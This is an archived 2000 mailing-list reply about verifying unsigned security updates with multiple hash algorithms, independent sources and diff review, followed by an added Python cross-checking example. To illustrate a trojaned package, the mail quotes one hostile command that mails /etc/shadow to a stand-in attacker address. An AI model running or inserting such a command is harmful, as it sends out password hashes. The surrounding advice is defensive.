Mailinglist Archive: opensuse-security (601 mails)

Re: [suse-security] autorpm and latest secure files
  • From: Gerhard Sittig <Gerhard.Sittig@xxxxxxx>
  • Date: Fri, 11 Aug 2000 20:42:31 +0200
  • Message-id: <20000811204231.F261@xxxxxxxxxxxxx>
On Thu, Aug 10, 2000 at 21:25 +0200, Thomas Forbriger wrote:
>
> What are the recommended steps to do security updates from FTP
> when there is no PGP signature in the files? You know there was
> this incident with tripwire on the Dutch server that was hacked
> and trojaned as far as I remember. Is there a reason to worry
> about somebody being able to hack and trojan the security
> updates supplied via ftp AND to hack and change the md5 sums
> provided by SuSE at the same time? Or is this coincidence too
> far from being probable?

The solution would be to combine several methods of checking.
Even if an attacker can compromise the data in a way that one
algo still fits (MD5 is not 100% secure after all -- how do you
want to have unique fingerprints for *any* data when you only
have 128 bits to store them?) a second one (SHA1, RIPEMD160)
probably fails.

If you use tripwire, put another "tripwire alike" besides it. If
you have an update package with no sig to check against, get it
from different (independent) places and compare them. If the
update is available in source form, try to read the diff against
the former version. Even if you don't know the internals
exactly, you would have recognized some unexpected "mail
attacker@somewhere < /etc/shadow" commands in a compromised tcpd
package.

Don't rely on a single source, double check for consistency what
you get from different directions. Make use of every hurdle you
can stack up instead of thinking "one obstacle in the chain
should suffice".

And don't believe in "automated security". I feel quite strongly
that automatic updates won't work without heavy human
supervision. :) Having your system (potentially) damaged by a
simple-minded program sucking in every update unchecked just
because "the file was there and I felt like applying it" is not
fun. When something breaks, *I* want to be the reason why. :>


virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@xxxxxxx
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.
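
The cross-checking described in this message (more than one digest algorithm, more than one independent source), as an added example that is not part of the original mail. The source names `mirror-a` and `mirror-b`, the helper names and the package bytes are constructed for illustration; RIPEMD160 is left out because not every Python `hashlib` build provides it.

```python
import hashlib
import io

ALGOS = ("md5", "sha1")  # assumption: two algorithms every hashlib build offers

def digests(stream, chunk=65536):
    """Hash one binary stream with every algorithm in ALGOS in a single pass."""
    hashers = {name: hashlib.new(name) for name in ALGOS}
    for block in iter(lambda: stream.read(chunk), b""):
        for h in hashers.values():
            h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}

def cross_check(copies, published=None):
    """copies: {source_name: binary stream}, one per independent download.
    published: {algo: hex digest} obtained over a separate channel (optional).
    Returns (ok, report); any disagreement or a lone source means not ok."""
    results = {src: digests(stream) for src, stream in copies.items()}
    report = []
    if len(results) < 2:
        report.append("only one source: nothing to compare against")
    reference_src = next(iter(results))
    for src, sums in results.items():
        for algo in ALGOS:
            if sums[algo] != results[reference_src][algo]:
                report.append(f"{src} differs from {reference_src} ({algo})")
            # A missing published digest counts as a mismatch (fail closed).
            if published and sums[algo] != published.get(algo):
                report.append(f"{src} does not match published {algo}")
    return (not report, report)

# Constructed sample data standing in for one package fetched several times.
GOOD = b"constructed package payload\n" * 1000
BAD = GOOD + b"# constructed unexpected trailing bytes\n"
PUBLISHED = digests(io.BytesIO(GOOD))  # stands in for sums obtained elsewhere

def demo():
    clean = cross_check({"mirror-a": io.BytesIO(GOOD),
                         "mirror-b": io.BytesIO(GOOD)}, PUBLISHED)
    mixed = cross_check({"mirror-a": io.BytesIO(GOOD),
                         "mirror-b": io.BytesIO(BAD)}, PUBLISHED)
    return clean, mixed

if __name__ == "__main__":
    for ok, report in demo():
        print("ACCEPT" if ok else "REJECT", report)
```

A passing result only says the copies and the published sums agree with each other; reading the source diff, as the message suggests, remains a separate manual step.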
